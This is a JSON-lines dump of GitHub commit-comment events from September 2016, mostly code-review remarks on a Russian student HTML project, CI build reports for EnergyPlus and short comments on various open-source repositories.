{"id":"4566215809","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030833,"position":381,"line":131,"path":"catalog.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T05:44:50Z","updated_at":"2016-09-15T05:44:50Z","body":"\"по убывания\" - опечатка"}},"created_at":"2016-09-15T05:44:50Z"}
{"id":"4566215893","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19030834,"position":null,"line":null,"path":null,"commit_id":"5a365e54deb644b86a634dbb422c67c25bcc6393","created_at":"2016-09-15T05:44:52Z","updated_at":"2016-09-15T05:44:52Z","body":"versionNumbers (mitchute) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2369 of 2369 tests passed, 21 test warnings)\n\n * 21 tests had: EIO diffs.\n * 21 tests had: ERR diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5a365e54deb644b86a634dbb422c67c25bcc6393-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5a365e54deb644b86a634dbb422c67c25bcc6393-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-15T05:44:52Z"}
{"id":"4566217930","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19030840,"position":null,"line":null,"path":null,"commit_id":"5a365e54deb644b86a634dbb422c67c25bcc6393","created_at":"2016-09-15T05:45:48Z","updated_at":"2016-09-15T05:45:48Z","body":"versionNumbers (mitchute) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5a365e54deb644b86a634dbb422c67c25bcc6393-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-15T05:45:48Z"}
{"id":"4566219657","type":"CommitCommentEvent","actor":{"login":"calmh"},"repo":{"name":"syncthing/syncthing"},"payload":{"comment":{"id":19030842,"position":null,"line":null,"path":null,"commit_id":"139e9b144eba1f94f4d847a5c234c825a6d09078","created_at":"2016-09-15T05:46:29Z","updated_at":"2016-09-15T05:46:29Z","body":"Yep all for you @aviau whilst I was anyway updating stuff... :) It wasn't arm specific either."}},"created_at":"2016-09-15T05:46:29Z"}
{"id":"4566220705","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030851,"position":510,"line":260,"path":"catalog.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T05:46:56Z","updated_at":"2016-09-15T05:46:56Z","body":"потеряли букву a в слове pagination"}},"created_at":"2016-09-15T05:46:56Z"}
{"id":"4566221813","type":"CommitCommentEvent","actor":{"login":"Pwangchuk"},"repo":{"name":"Pwangchuk/AndroidProject2CS450"},"payload":{"comment":{"id":19030855,"position":9,"line":9,"path":"AccelerometerInClassExample/app/src/main/java/com/example/ehar/accelerometercs450/MainActivity.java","commit_id":"b744dc2f655a67b96d5735e1b09d75feca779aa0","created_at":"2016-09-15T05:47:27Z","updated_at":"2016-09-15T05:47:27Z","body":"// Written by: Palchen Wangchuk\r\n// Cite: https://help.github.com/articles/adding-an-existing-project-to-github-using-the-command-line/\r\n// Cite: http://www.androidauthority.com/get-use-location-data-android-app-625012/\r\n// Cite: http://stackoverflow.com/questions/2227292/how-to-get-latitude-and-longitude-of-the-mobile-device-in-android"}},"created_at":"2016-09-15T05:47:27Z"}
{"id":"4566221998","type":"CommitCommentEvent","actor":{"login":"agustriana289"},"repo":{"name":"agustriana289/wapka_arsipmusik"},"payload":{"comment":{"id":19030856,"position":1,"line":1,"path":"README.md","commit_id":"935df39fab59f9d36c38476e52a751ec8bd56da2","created_at":"2016-09-15T05:47:31Z","updated_at":"2016-09-15T05:47:31Z","body":"Ini adalah kode-kode dalam membuat wap musik full album di wapka seperti arsipmusik"}},"created_at":"2016-09-15T05:47:31Z"}
{"id":"4566222592","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19030857,"position":null,"line":null,"path":null,"commit_id":"e2ebaf843c581849d62828b114e77374bd5d45c0","created_at":"2016-09-15T05:47:45Z","updated_at":"2016-09-15T05:47:45Z","body":"Initial commit."}},"created_at":"2016-09-15T05:47:45Z"}
{"id":"4566222973","type":"CommitCommentEvent","actor":{"login":"prabu6689"},"repo":{"name":"prabu6689/project2"},"payload":{"comment":{"id":19030858,"position":null,"line":null,"path":null,"commit_id":"d1f398e78604a06edcccd57493eff1af584e7a74","created_at":"2016-09-15T05:47:55Z","updated_at":"2016-09-15T05:47:55Z","body":"how r u commit"}},"created_at":"2016-09-15T05:47:55Z"}
{"id":"4566223251","type":"CommitCommentEvent","actor":{"login":"prabu6689"},"repo":{"name":"prabu6689/project2"},"payload":{"comment":{"id":19030859,"position":null,"line":null,"path":null,"commit_id":"d1f398e78604a06edcccd57493eff1af584e7a74","created_at":"2016-09-15T05:48:03Z","updated_at":"2016-09-15T05:48:03Z","body":"jggjh"}},"created_at":"2016-09-15T05:48:03Z"}
{"id":"4566223494","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19030860,"position":null,"line":null,"path":null,"commit_id":"3c8ea0c902d6e666255a2a94435b08100521b88c","created_at":"2016-09-15T05:48:09Z","updated_at":"2016-09-15T05:48:09Z","body":"Related to: backdrop/backdrop-issues#897 "}},"created_at":"2016-09-15T05:48:09Z"}
{"id":"4566223509","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19030861,"position":null,"line":null,"path":null,"commit_id":"3bba58dc54846a6fc1726a5f4e791d45a3ececc4","created_at":"2016-09-15T05:48:09Z","updated_at":"2016-09-15T05:48:09Z","body":"Related to: backdrop/backdrop-issues#897 "}},"created_at":"2016-09-15T05:48:09Z"}
{"id":"4566223973","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030862,"position":518,"line":268,"path":"catalog.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T05:48:19Z","updated_at":"2016-09-15T05:48:19Z","body":"название класса не должно начинаться с заглавной буквы, и сюда нужно добавить центрирующий класс"}},"created_at":"2016-09-15T05:48:19Z"}
{"id":"4566224965","type":"CommitCommentEvent","actor":{"login":"Pwangchuk"},"repo":{"name":"Pwangchuk/AndroidProject2CS450"},"payload":{"comment":{"id":19030864,"position":9,"line":9,"path":"AccelerometerInClassExample/app/src/main/java/com/example/ehar/accelerometercs450/MainActivity.java","commit_id":"b744dc2f655a67b96d5735e1b09d75feca779aa0","created_at":"2016-09-15T05:48:42Z","updated_at":"2016-09-15T05:48:42Z","body":"Sorry, I am doing this in a rush. If i had time, I would have done it in Android Studio and committed it once more"}},"created_at":"2016-09-15T05:48:42Z"}
{"id":"4566225260","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19030865,"position":null,"line":null,"path":null,"commit_id":"1c00e4d766020d274da372949fe740f9f0050b72","created_at":"2016-09-15T05:48:50Z","updated_at":"2016-09-15T05:48:50Z","body":"Initial commit"}},"created_at":"2016-09-15T05:48:50Z"}
{"id":"4566228364","type":"CommitCommentEvent","actor":{"login":"chooxy"},"repo":{"name":"nus-cs2103-AY1617S1/addressbook-level3"},"payload":{"comment":{"id":19030869,"position":null,"line":null,"path":null,"commit_id":"4a38035965d125a0c4b93f54a3b1f2cc12ddf92e","created_at":"2016-09-15T05:50:09Z","updated_at":"2016-09-15T05:50:09Z","body":"Added a user story, not a use case."}},"created_at":"2016-09-15T05:50:09Z"}
{"id":"4566228897","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030870,"position":527,"line":277,"path":"catalog.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T05:50:21Z","updated_at":"2016-09-15T05:50:21Z","body":"добавить центрирующий класс"}},"created_at":"2016-09-15T05:50:21Z"}
{"id":"4566229150","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030871,"position":558,"line":308,"path":"catalog.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T05:50:27Z","updated_at":"2016-09-15T05:50:27Z","body":"добавить центрирующий класс"}},"created_at":"2016-09-15T05:50:27Z"}
{"id":"4566231011","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030873,"position":567,"line":317,"path":"catalog.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T05:51:12Z","updated_at":"2016-09-15T05:51:12Z","body":"откуда здесь запятые??"}},"created_at":"2016-09-15T05:51:12Z"}
{"id":"4566231112","type":"CommitCommentEvent","actor":{"login":"jtbandes"},"repo":{"name":"infininight/swift.tmbundle"},"payload":{"comment":{"id":19030874,"position":null,"line":null,"path":null,"commit_id":"547b7a6d7a91e4dd91f3992cbb150959942ed3f2","created_at":"2016-09-15T05:51:14Z","updated_at":"2016-09-15T05:51:14Z","body":"![image](https://cloud.githubusercontent.com/assets/14237/18539644/bafde61c-7acd-11e6-9a20-492d7567292e.png)\r\n"}},"created_at":"2016-09-15T05:51:14Z"}
{"id":"4566231636","type":"CommitCommentEvent","actor":{"login":"andy5995"},"repo":{"name":"andy5995/rmw"},"payload":{"comment":{"id":19030875,"position":null,"line":null,"path":null,"commit_id":"6897b17fa0b12d740c2bc3dca50a6c894ddfeddc","created_at":"2016-09-15T05:51:26Z","updated_at":"2016-09-15T05:51:26Z","body":"This commit was for issue #33 not #38"}},"created_at":"2016-09-15T05:51:26Z"}
{"id":"4566234634","type":"CommitCommentEvent","actor":{"login":"evpobr"},"repo":{"name":"erikd/libsndfile"},"payload":{"comment":{"id":19030876,"position":null,"line":null,"path":null,"commit_id":"a603d70bb8fe013f2ee67dbea594ca6a8c3ddf69","created_at":"2016-09-15T05:52:38Z","updated_at":"2016-09-15T05:52:38Z","body":"@erikd, we cannot link to `m` directly, there is no `m` library e.g. under Win32. That is why I introduced a variable `${M_LIBRARY}`. If `m` is absent, `${M_LIBRARY}` is empty."}},"created_at":"2016-09-15T05:52:38Z"}
{"id":"4566238373","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030886,"position":565,"line":261,"path":"catalog.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T05:54:12Z","updated_at":"2016-09-15T05:54:12Z","body":"Этого тоже нет в макете, если это вы уже начали применять progressive enhancement, то это весьма странно добавлять в макет  и в проект то чего нет в макете. Нужно учиться делать существующие элементы \"постепенно улучшенными\", а не добавлять новые элементы "}},"created_at":"2016-09-15T05:54:12Z"}
{"id":"4566239490","type":"CommitCommentEvent","actor":{"login":"dhalperi"},"repo":{"name":"apache/incubator-beam"},"payload":{"comment":{"id":19030891,"position":null,"line":null,"path":null,"commit_id":"321ffc2ed8c48a6f4bc487d44eecf1355ca3798c","created_at":"2016-09-15T05:54:39Z","updated_at":"2016-09-15T05:54:39Z","body":"This test actually doesn't pass on Dataflow. Take a look?"}},"created_at":"2016-09-15T05:54:39Z"}
{"id":"4566241057","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown-Client"},"payload":{"comment":{"id":19030898,"position":null,"line":null,"path":null,"commit_id":"05914194c65b8acdf6cda250d2facc075e331f3a","created_at":"2016-09-15T05:55:18Z","updated_at":"2016-09-15T05:55:18Z","body":"We've never had multiline messages; I see no reason to change the protocol now..."}},"created_at":"2016-09-15T05:55:18Z"}
{"id":"4566241847","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19030902,"position":null,"line":null,"path":null,"commit_id":"65454165c4f2311965a9fe30f06fa59bf3349e42","created_at":"2016-09-15T05:55:35Z","updated_at":"2016-09-15T05:55:35Z","body":"Related to: backdrop/backdrop-issues#2107 "}},"created_at":"2016-09-15T05:55:35Z"}
{"id":"4566241852","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19030903,"position":null,"line":null,"path":null,"commit_id":"9a31869414e0c215788f15935d3823e582dbb632","created_at":"2016-09-15T05:55:35Z","updated_at":"2016-09-15T05:55:35Z","body":"Related to: backdrop/backdrop-issues#2107 "}},"created_at":"2016-09-15T05:55:35Z"}
{"id":"4566241863","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19030904,"position":null,"line":null,"path":null,"commit_id":"3978813e8e90af55779ccb72850e813c0d667fde","created_at":"2016-09-15T05:55:35Z","updated_at":"2016-09-15T05:55:35Z","body":"Related to: backdrop/backdrop-issues#2107 "}},"created_at":"2016-09-15T05:55:35Z"}
{"id":"4566241869","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19030905,"position":null,"line":null,"path":null,"commit_id":"d194951712d12dabfca1a496d8be6c92ddc88192","created_at":"2016-09-15T05:55:35Z","updated_at":"2016-09-15T05:55:35Z","body":"Related to: backdrop/backdrop-issues#2107 "}},"created_at":"2016-09-15T05:55:35Z"}
{"id":"4566241877","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19030906,"position":null,"line":null,"path":null,"commit_id":"d5e9a505cbb205e49e48015d18fce2ca88fef2c4","created_at":"2016-09-15T05:55:35Z","updated_at":"2016-09-15T05:55:35Z","body":"Related to: backdrop/backdrop-issues#2107 "}},"created_at":"2016-09-15T05:55:35Z"}
{"id":"4566242791","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030909,"position":344,"line":94,"path":"catalog.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T05:55:57Z","updated_at":"2016-09-15T05:55:57Z","body":"опечатка в fieldset"}},"created_at":"2016-09-15T05:55:57Z"}
{"id":"4566245365","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030913,"position":98,"line":10,"path":"index.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T05:57:01Z","updated_at":"2016-09-15T05:57:01Z","body":"структура должна быть такая же, как я описала выше для страницы каталога"}},"created_at":"2016-09-15T05:57:01Z"}
{"id":"4566245587","type":"CommitCommentEvent","actor":{"login":"kring"},"repo":{"name":"TerriaJS/terriajs"},"payload":{"comment":{"id":19030914,"position":46,"line":594,"path":"lib/Models/WebProcessingServiceCatalogFunction.js","commit_id":"a1a9265f57299eff87d80e162d0dcc27caeddb40","created_at":"2016-09-15T05:57:07Z","updated_at":"2016-09-15T05:57:07Z","body":"Is this just a case of different versions of the spec?  2.0 came out relatively recently, but we're currently using 1.0."}},"created_at":"2016-09-15T05:57:07Z"}
{"id":"4566246642","type":"CommitCommentEvent","actor":{"login":"Dhop84"},"repo":{"name":"Dhop84/KODI-SickRage"},"payload":{"comment":{"id":19030916,"position":null,"line":null,"path":null,"commit_id":"b0cafc12e0859e9baba65a6a89eaf7c229ea21f4","created_at":"2016-09-15T05:57:31Z","updated_at":"2016-09-15T05:57:31Z","body":"Im new so bare with me, is there anyway of being able to add shows through other addons? for example if im browsing a tv guide or an addon that has a tv list of shows or one that has a shows calendar or something?\r\n\r\nThanks for your time "}},"created_at":"2016-09-15T05:57:31Z"}
{"id":"4566247110","type":"CommitCommentEvent","actor":{"login":"marcobiedermann"},"repo":{"name":"joshbuchea/HEAD"},"payload":{"comment":{"id":19030918,"position":29,"line":40,"path":"_layouts/default.html","commit_id":"4cd6e5ce9b80dd1b12afadcfbee5f046afeedca7","created_at":"2016-09-15T05:57:40Z","updated_at":"2016-09-15T05:57:40Z","body":"@joshbuchea You also removed this section, which opens all external links in a new tab"}},"created_at":"2016-09-15T05:57:40Z"}
{"id":"4566249132","type":"CommitCommentEvent","actor":{"login":"hueidou"},"repo":{"name":"wanfangdata/guide"},"payload":{"comment":{"id":19030920,"position":null,"line":null,"path":null,"commit_id":"567de49b5ae1f710edeb9baacad6aa5c080ec3be","created_at":"2016-09-15T05:58:26Z","updated_at":"2016-09-15T05:58:26Z","body":"@meibaorui 只要是标题，生成html时就会有锚点（href=\"#asdf\"）。\r\n\r\n目录是手动写的，就是列表+链接，指向锚点。"}},"created_at":"2016-09-15T05:58:26Z"}
{"id":"4566250552","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030927,"position":123,"line":35,"path":"index.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T05:59:00Z","updated_at":"2016-09-15T05:59:00Z","body":"В этом блоке нужно разметить еще и элементы которые появятся по клику на \"Войти\" - http://joxi.ru/n2Ye6VOFjqb8q2"}},"created_at":"2016-09-15T05:59:00Z"}
{"id":"4566251028","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19030929,"position":null,"line":null,"path":null,"commit_id":"8b8226a4796b6cc30e977e8d8828d38d92452211","created_at":"2016-09-15T05:59:11Z","updated_at":"2016-09-15T05:59:11Z","body":"makingPrettyTransition (mitchute) - i386-Windows-7-VisualStudio-12: OK (2327 of 2335 tests passed, 24 test warnings)\n\n * 10 tests had: AUD diffs.\n * 31 tests had: ERR diffs.\n * 7 tests had: Table big diffs.\n * 21 tests had: EIO diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8b8226a4796b6cc30e977e8d8828d38d92452211-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8b8226a4796b6cc30e977e8d8828d38d92452211-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.66%25-yellow.svg)</a> \n"}},"created_at":"2016-09-15T05:59:11Z"}
{"id":"4566251544","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030933,"position":160,"line":72,"path":"index.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T05:59:25Z","updated_at":"2016-09-15T05:59:25Z","body":"Добавить центрирующий блок"}},"created_at":"2016-09-15T05:59:25Z"}
{"id":"4566251947","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030934,"position":158,"line":70,"path":"index.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T05:59:35Z","updated_at":"2016-09-15T05:59:35Z","body":"убрать это блок"}},"created_at":"2016-09-15T05:59:35Z"}
{"id":"4566256229","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030972,"position":173,"line":85,"path":"index.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T06:01:07Z","updated_at":"2016-09-15T06:01:07Z","body":"здесь вам нужно будет сделать слайдер - то есть нужен еще родительский блок, и в нем уже два блока со слайдами и подписями. "}},"created_at":"2016-09-15T06:01:07Z"}
{"id":"4566257372","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030974,"position":357,"line":105,"path":"index.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T06:01:33Z","updated_at":"2016-09-15T06:01:33Z","body":"добавить центрирующий блок"}},"created_at":"2016-09-15T06:01:33Z"}
{"id":"4566257947","type":"CommitCommentEvent","actor":{"login":"phile314"},"repo":{"name":"agda/agda"},"payload":{"comment":{"id":19030980,"position":47,"line":166,"path":"src/full/Agda/Compiler/MAlonzo/Primitives.hs","commit_id":"4ac6175a6983e310476ea80308a047df81b3b6b5","created_at":"2016-09-15T06:01:45Z","updated_at":"2016-09-15T06:01:45Z","body":"This means MAlonzo generated code can now have a dependency on the ieee746 package, right? This probably should be documented in the user manual."}},"created_at":"2016-09-15T06:01:45Z"}
{"id":"4566258607","type":"CommitCommentEvent","actor":{"login":"uRandomAlex"},"repo":{"name":"MFSiNC/SkidCheck-2.0"},"payload":{"comment":{"id":19030985,"position":null,"line":null,"path":null,"commit_id":"5aa6d8d11ff9bb5e27353ff43b3e8618bd7444c8","created_at":"2016-09-15T06:02:02Z","updated_at":"2016-09-15T06:02:02Z","body":"It's probably better to clean the lists instead of adding yourself in."}},"created_at":"2016-09-15T06:02:02Z"}
{"id":"4566259271","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030989,"position":415,"line":163,"path":"index.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T06:02:17Z","updated_at":"2016-09-15T06:02:17Z","body":"добавить центрирующий блок"}},"created_at":"2016-09-15T06:02:17Z"}
{"id":"4566260023","type":"CommitCommentEvent","actor":{"login":"svanharmelen"},"repo":{"name":"fatih/vim-go"},"payload":{"comment":{"id":19030991,"position":null,"line":null,"path":null,"commit_id":"451f8a0daaf7f0f000ca38bb9b90dd92a14fe811","created_at":"2016-09-15T06:02:37Z","updated_at":"2016-09-15T06:02:37Z","body":"🎉 "}},"created_at":"2016-09-15T06:02:37Z"}
{"id":"4566261960","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030994,"position":415,"line":163,"path":"index.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T06:03:24Z","updated_at":"2016-09-15T06:03:24Z","body":"добавить центрирующий блок"}},"created_at":"2016-09-15T06:03:24Z"}
{"id":"4566265321","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030998,"position":416,"line":164,"path":"index.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T06:04:45Z","updated_at":"2016-09-15T06:04:45Z","body":"нужно добавить родительский блок для h3 и кнопки-ссылки, и для кнопки-ссылки тогда <p> будет лишним"}},"created_at":"2016-09-15T06:04:45Z"}
{"id":"4566265715","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19031000,"position":358,"line":106,"path":"index.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T06:04:56Z","updated_at":"2016-09-15T06:04:56Z","body":"нужно добавить родительский блок для h3 и кнопки-ссылки, и для кнопки-ссылки тогда"}},"created_at":"2016-09-15T06:04:56Z"}
{"id":"4566266996","type":"CommitCommentEvent","actor":{"login":"Sycholic"},"repo":{"name":"Sycholic/PermissionsEx"},"payload":{"comment":{"id":19031002,"position":null,"line":null,"path":null,"commit_id":"371de43930d97816a892100b688bb9bccc9aaa7f","created_at":"2016-09-15T06:05:27Z","updated_at":"2016-09-15T06:05:27Z","body":"Forgot line #186 in error report will just add it on next commit.  meh still derp'n git stuff bleh.."}},"created_at":"2016-09-15T06:05:27Z"}
{"id":"4566267180","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19031003,"position":420,"line":168,"path":"index.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T06:05:32Z","updated_at":"2016-09-15T06:05:32Z","body":"перенесите тег img на следующую строку, так удобнее читать код"}},"created_at":"2016-09-15T06:05:32Z"}
{"id":"4566268701","type":"CommitCommentEvent","actor":{"login":"dmitry-zaets"},"repo":{"name":"StarRatio/star-ratio"},"payload":{"comment":{"id":19031005,"position":null,"line":null,"path":null,"commit_id":"45e2bedff33783e050f785822656bc1be56a8aee","created_at":"2016-09-15T06:05:50Z","updated_at":"2016-09-15T06:05:50Z","body":"@jdalton thanks for a suggestion! Sound great!"}},"created_at":"2016-09-15T06:05:50Z"}
{"id":"4566272146","type":"CommitCommentEvent","actor":{"login":"jcvenegas"},"repo":{"name":"jcvenegas/hyperstart"},"payload":{"comment":{"id":19031012,"position":null,"line":null,"path":null,"commit_id":"1cc770522f54a8b09858fdb6d02e0b3ef91e223d","created_at":"2016-09-15T06:07:16Z","updated_at":"2016-09-15T06:07:16Z","body":"@dlespiau  thanks for the feedback ,  I was thinking about provide an specific name, systemd install a binary using  its name. \r\nI like --with-binary-name idea or something --with-daemon-name to generate a \"daemon\" binary with its systemd service."}},"created_at":"2016-09-15T06:07:16Z"}
{"id":"4566275939","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19031016,"position":453,"line":201,"path":"index.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T06:08:41Z","updated_at":"2016-09-15T06:08:41Z","body":"Добавить центрирующий блок"}},"created_at":"2016-09-15T06:08:41Z"}
{"id":"4566277118","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19031018,"position":476,"line":224,"path":"index.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T06:09:10Z","updated_at":"2016-09-15T06:09:10Z","body":"Добавить центрирующий блок"}},"created_at":"2016-09-15T06:09:10Z"}
{"id":"4566282050","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19031029,"position":null,"line":null,"path":null,"commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T06:11:10Z","updated_at":"2016-09-15T06:11:10Z","body":"/Затраченное время - 1ч /"}},"created_at":"2016-09-15T06:11:10Z"}
{"id":"4566282229","type":"CommitCommentEvent","actor":{"login":"SloMusti"},"repo":{"name":"IRNAS/Troublemaker2"},"payload":{"comment":{"id":19031030,"position":null,"line":null,"path":null,"commit_id":"3feb24c522f09800f330568e186ed6ba891ef1bf","created_at":"2016-09-15T06:11:13Z","updated_at":"2016-09-15T06:11:13Z","body":"Yes, Solidworks updates dont best reflect on file versioning, but generally there are only minor changes and improvements."}},"created_at":"2016-09-15T06:11:13Z"}
{"id":"4566283057","type":"CommitCommentEvent","actor":{"login":"Hadatko"},"repo":{"name":"EmbeddedRPC/erpc"},"payload":{"comment":{"id":19031032,"position":14,"line":67,"path":"erpc_c/setup/erpc_setup.h","commit_id":"142ecdb6a595d5ad76da0a4b53c8a4e5ee8868f9","created_at":"2016-09-15T06:11:32Z","updated_at":"2016-09-15T06:11:32Z","body":"Now comment is missing. There should be as i wrote _EMBEDDED_RPC_SETUP_H_."}},"created_at":"2016-09-15T06:11:32Z"}
{"id":"4566283261","type":"CommitCommentEvent","actor":{"login":"05bca054"},"repo":{"name":"driftyco/ionic"},"payload":{"comment":{"id":19031035,"position":null,"line":null,"path":null,"commit_id":"596392165523ca49ae4acb34d62bdac6eb414537","created_at":"2016-09-15T06:11:36Z","updated_at":"2016-09-15T06:11:36Z","body":" :+1:  Now update to angular final"}},"created_at":"2016-09-15T06:11:36Z"}
{"id":"4566288192","type":"CommitCommentEvent","actor":{"login":"Sarthak-02"},"repo":{"name":"Sarthak-02/Data-Structure-java"},"payload":{"comment":{"id":19031041,"position":5,"line":4,"path":"Link_List.java","commit_id":"0f89f07e8efdf1a23f75987dd4f37e7e401e81c9","created_at":"2016-09-15T06:13:43Z","updated_at":"2016-09-15T06:13:43Z","body":"line gala hai"}},"created_at":"2016-09-15T06:13:43Z"}
{"id":"4566289312","type":"CommitCommentEvent","actor":{"login":"Hadatko"},"repo":{"name":"EmbeddedRPC/erpc"},"payload":{"comment":{"id":19031044,"position":4,"line":34,"path":"erpc_c/setup/erpc_setup.h","commit_id":"142ecdb6a595d5ad76da0a4b53c8a4e5ee8868f9","created_at":"2016-09-15T06:14:09Z","updated_at":"2016-09-15T06:14:09Z","body":"\"erpc_config_internal.h\" these header file have to be here, but can be removed from client/server setup file can't be?"}},"created_at":"2016-09-15T06:14:09Z"}
